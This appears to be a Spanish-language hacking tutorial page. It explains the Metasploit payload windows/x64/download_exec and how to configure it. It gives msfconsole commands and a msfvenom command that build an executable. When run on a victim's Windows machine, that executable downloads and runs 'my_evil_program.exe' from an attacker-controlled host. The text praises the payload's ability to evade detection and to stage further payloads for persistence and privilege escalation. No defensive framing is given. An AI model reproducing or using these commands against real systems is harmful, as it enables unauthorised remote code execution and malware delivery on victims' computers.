Hacking metasploit modulo Windows Download Execute
www.onlinetis.com
Hacking metasploit modulo Windows Download Execute.
El uso del payload windows/x64/download_exec
en Metasploit.
Este payload es un módulo de Metasploit que permite a un atacante descargar y ejecutar un archivo ejecutable (.exe) en un sistema Windows de 64 bits.
Aquí te explico cómo funciona y cómo se usa:
Descripción del Payload
El payload windows/x64/download_exec
es un shellcode que se ejecuta en la memoria de la víctima. Su función principal es descargar un archivo ejecutable desde una URL específica y ejecutarlo en segundo plano. Esto es útil para:
Evadir la detección: El payload en sí es pequeño y simple, y la carga maliciosa real se descarga después, lo que puede ayudar a evadir algunas soluciones de seguridad.
Post-explotación: Es una forma rápida de mover un payload más grande, como un meterpreter, al sistema de la víctima una vez que se ha obtenido acceso inicial.
Flexibilidad: Permite al atacante cambiar el ejecutable que se descarga sin tener que generar un nuevo payload.
Opciones del Payload
Para usar este payload, debes configurar las siguientes opciones:
URL
: La URL donde se encuentra el archivo ejecutable que deseas descargar. Por ejemplo,http://192.168.1.100/malware.exe
.FILENAME
: El nombre con el que se guardará el archivo en el sistema de la víctima. Es opcional, y si no se especifica, el nombre del archivo se tomará de la URL.CMD_TIMEOUT
: El tiempo de espera en segundos para la ejecución del comando de descarga.
Ejemplo de Uso en Metasploit
A continuación, se muestra un ejemplo básico de cómo se usa este payload dentro de la consola de Metasploit (msfconsole
):
Cargar el exploit: Primero, debes seleccionar un exploit que te permita entregar este payload. Por ejemplo, un exploit de vulnerabilidad en un navegador web o un ataque de phishing con un archivo PDF malicioso.
Bashmsf6 > use exploit/multi/handler msf6 exploit(multi/handler) > set PAYLOAD windows/x64/download_exec
Configurar las opciones del payload:
Bashmsf6 exploit(multi/handler) > set URL http://192.168.1.100/my_evil_program.exe msf6 exploit(multi/handler) > set LHOST 192.168.1.100 msf6 exploit(multi/handler) > set LPORT 4444
Nota:
LHOST
yLPORT
se usan en el contexto de unhandler
para escuchar la conexión inversa, aunque este payload no establece una.
Generar el payload: Ahora, puedes generar el payload y exportarlo a un archivo.
Bashmsf6 exploit(multi/handler) > generate -f raw -o payload.bin
También puedes generar el payload directamente con
msfvenom
:Bashmsfvenom -p windows/x64/download_exec URL=http://192.168.1.100/my_evil_program.exe -f exe -o final_payload.exe
En este caso, msfvenom
crea un archivo exe
que, al ejecutarse en la máquina de la víctima, descargará y ejecutará my_evil_program.exe
desde tu servidor web (192.168.1.100
).
Resumen
El payload windows/x64/download_exec
es una herramienta eficiente para la ejecución remota de código (RCE). Permite al atacante cargar un ejecutable secundario en el sistema de la víctima, facilitando la escalada de privilegios o el establecimiento de una conexión persistente.